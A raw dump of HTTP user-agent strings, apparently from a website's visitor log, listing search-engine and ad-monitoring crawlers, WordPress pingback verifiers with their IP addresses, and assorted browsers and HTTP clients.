tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635303841-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.93 Safari/537.36 OPR/77.0.4054.277 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635293651-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635303842-0 +WordPress.com; https://mugdhaafictions.wordpress.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635293645-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635303838-0 +HTTPie/1.0.3 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635331512-0 +Apache-HttpClient/4.5.12 (Java/17) +Apache-HttpClient/4.5.12 (Java/1.8.0_311) +Apache-HttpClient/4.5.12 (Java/1.8.0_301) +Apache-HttpClient/4.5.12 (Java/1.8.0_292) +WordPress/5.8.1; https://epng.top +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/95.0.4638.54 Mobile Safari/537.36 +WordPress/5.8.1; https://articleauto.com +WordPress/5.8.1; https://kidomoms.com +WordPress/5.6.5; https://neftetreid.com +WordPress/4.8.17; http://expoarcon.online +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635382817-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635395076-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635425017-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635386926-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635398011-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635456006-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635420957-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635421017-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635420957-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635421017-60 +ddg_android/5.99.0 (com.duckduckgo.mobile.android; Android API 29) +WordPress/5.8.1; https://booksprice.ru +WordPress/5.8.1; https://doma35.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635420956-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635421017-10 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe) +Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) [ip:45.125.216.44] +Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) [ip:66.143.216.33] +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:40.77.167.33 +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:157.55.39.172 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635467528-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635478137-0 +WordPress/5.8.1; https://ukrads.info +WhatsApp/2.21.22.16 A +Mozilla/5.0 (Windows NT 6.1; WOW64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 YaBrowser/21.8.3.607 Yowser/2.5 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 +Another_HTML-lint/1.28 +libwww-perl/5.805 +WordPress/5.3.9; https://top-office11.ru +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler+aardwolf-crawler-49@moz.com) +WhatsApp/2.21.21.16 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635520100-10 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +WhatsApp/2.21.21.11 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635471185-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635482019-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 PTST/211020.154311 +WordPress/5.8.1; https://my-sertif.ru +WordPress/5.8.1; https://otvetpk.ru +WordPress/5.8.1; https://webpodrugi.ru +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.8.1; https://technicaljayendra.com +Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:157.55.39.178 +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:207.46.13.189 +PHP/6.2.68 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635634031-10 +WordPress.com; https://sazano123.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635558826-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635568881-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635597487-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635610048-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635615283-0 +WordPress/5.8.1; https://lesoutrali.com/fr +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1635633716-0 +Mozilla/5.0 (compatible; YandexAccessibilityBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.3 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 5.0.1; Micromax_Q4101 ) U2/1.0.0 Mobile +Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:207.46.13.189 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.3.0.1130 (SpeedMode; Proxy; Android 8.1.0; DLI-TL20 ) U2/1.0.0 Mobile +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Mobile Safari/537.36 PTST/211020.154311 +WordPress/5.7.3; https://www.prixfrance.fr; verifying pingback from 192.198.124.230 +WordPress/5.3.9; http://www.dogsteam.com; verifying pingback from 2001:470:c406:9d72:5032:65c4:e043:cba0 +WordPress/4.7.21; http://mathiasdanbolt.com; verifying pingback from 2001:470:c406:3baf:9871:fcc:4789:6a0f +WordPress/4.7.21; http://mathiasdanbolt.com; verifying pingback from 2001:470:c406:dbbf:5dbd:68cb:3117:9b27 +WordPress/4.7.21; http://mathiasdanbolt.com; verifying pingback from 2001:470:c406:c607:50bc:d4d8:6e74:ebd3 +WordPress/5.3.9; http://www.dogsteam.com; verifying pingback from 2001:470:c406:50f8:fb48:b2de:fed7:47e0 +WordPress/4.7.21; http://mathiasdanbolt.com; verifying pingback from 2001:470:c406:f0ba:d2c5:1eeb:9ff8:6b1b +WordPress/4.7.21; http://muja-dental.aatsystems.de; verifying pingback from 2001:470:c406:98fa:d152:cd7a:3125:4d4 +WordPress/4.7.21; http://mathiasdanbolt.com; verifying pingback from 2001:470:c406:9ea5:ece2:a531:6ac2:6569 +WordPress/4.7.21; http://mathiasdanbolt.com; verifying pingback from 2001:470:c406:31ce:a10:4bb0:b5a4:3b16 +WordPress/5.8.1; https://miekebouma.nl; verifying pingback from 138.219.121.127 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635644175-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635654521-0 +WordPress/5.8.1; https://litmap.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635708889-0 +WordPress/5.8.1; https://myastrology.su +WordPress/5.8.1; https://repeater-zone.ru +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 8.1.0; SM-G600FY ) U2/1.0.0 Mobile +WordPress/5.8.1; https://9star.ru +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[CHROME_VERSION] Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635736778-10 +WordPress/4.7.21; http://mathiasdanbolt.com; verifying pingback from 2001:470:c406:c86:a6f9:2c29:7892:b533 +WordPress/5.3.9; http://www.dogsteam.com; verifying pingback from 2001:470:c406:38d:5d7:d64c:ff1a:6b92 +WordPress/4.7.21; http://mathiasdanbolt.com; verifying pingback from 2001:470:c406:7ed2:20a4:7f4e:74d4:403 +WordPress/4.7.21; http://muja-dental.aatsystems.de; verifying pingback from 2001:470:c406:bd34:990d:7e2b:f732:1d0c +WordPress/4.9.18; http://thejoyoflearning.com/web; verifying pingback from 178.128.123.197 +WordPress/4.8.17; http://www.monrodo.net; verifying pingback from 2001:470:c406:2029:5e9c:e606:e4a4:6d79 +WordPress/5.2.12; http://www.killerexe.de; verifying pingback from 2001:470:c406:48ea:860:64bd:7b77:8ed4 +WordPress/5.6.5; http://lyhytkampaus.com; verifying pingback from 2001:470:c406:730e:4934:373f:50cf:d69d +WordPress/4.0.33; http://www.prohor.org; verifying pingback from 82.211.57.228 +WordPress/5.8.1; http://chat457.com +WordPress/5.8.1; https://santehnika-terra.ru +WordPress/5.2.12; http://www.avifaunadrenthe.nl; verifying pingback from 2001:470:c406:f068:1f0:ee5b:5c98:1f35 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635736779-10 +Mozilla/5.0 (compatible; YandexAccessibilityBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635756595-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635772191-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635772208-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635772455-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635776645-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4495.0 Safari/537.36 +WhatsApp/2.21.22.21 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635799998-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635741603-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635750642-0 +MetaInspector/3.1.0 (+https://github.com/jaimeiniesta/metainspector) +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/95.0.4638.69 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635725375-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 7.0; DLI-TL20 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635736775-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635736780-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635736781-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 7.1.2; SM-N900 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635736776-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.k8s.crawler-production/1635807804-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635731624-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 PTST/211102.204522 +WordPress/5.8.1; https://bizkapish.com +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Mobile Safari/537.36 PTST/190509.230546 PTST/211102.204522 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635812081-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635823951-10 +WordPress/4.6.21; http://www.magic-beauty.pl; verifying pingback from 107.158.202.198 +HTTP_Request2/2.3.0 (http://pear.php.net/package/http_request2) PHP/7.3.31 +WordPress/4.7.21; http://tmocontracting.com; verifying pingback from 2001:470:c406:82c9:78f6:4baa:b6bf:e266 +WordPress/5.3.9; http://bubblefotbal.cz; verifying pingback from 2001:470:c406:ba36:2dc8:ecb0:a95c:bb0d +WordPress/5.3.9; https://oc-windows.ru +WordPress/5.4.2; http://jacksonvillechristianacademy.com; verifying pingback from 165.231.95.90 +WordPress/5.8.1; https://yorkshiredarts.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635812082-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635823952-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635855713-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635868910-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635881139-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635881141-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635845715-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635845714-0 +WhatsApp/2.21.21.18 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635859215-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635880950-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635880953-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635812084-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635812078-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635823952-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635823949-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.5.785 (SpeedMode; Proxy; Android 11; SM-M115F ) U2/1.0.0 Mobile +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.79 Mobile Safari/537.36 PTST/210331.204756 +Mozilla/5.0 (compatible; YandexAccessibilityBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4579.1 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635868315-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635812085-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635823980-0 +Java/11.0.12-internal +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635868315-60 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.k8s.crawler-production/1635897134-60 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 8.0.0; SM-J330G ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635812080-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635823950-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635868316-10 +WordPress/5.8.1; https://blackboardway.com +Getintent Crawler +WhatsApp/2.21.23.1 A +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Mobile Safari/537.36 PTST/211102.204522 +WordPress/5.8.1; https://loginvast.com +googleauth/1.4 (cebu QZC30.Q4-22-47-1) +WhatsApp/2.21.21.19 A +WordPress/5.8.1; https://wpbuffs.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635967896-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635907831-10 +WordPress/5.3.9; http://xn--c1abmmenk.xn--p1ai +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635907832-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635962183-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635962195-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635902197-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635912298-0 +Java/1.8.0_312 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635962869-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635898304-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635907829-0 +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/95.0.4638.54Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635907866-0 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1635953825-0 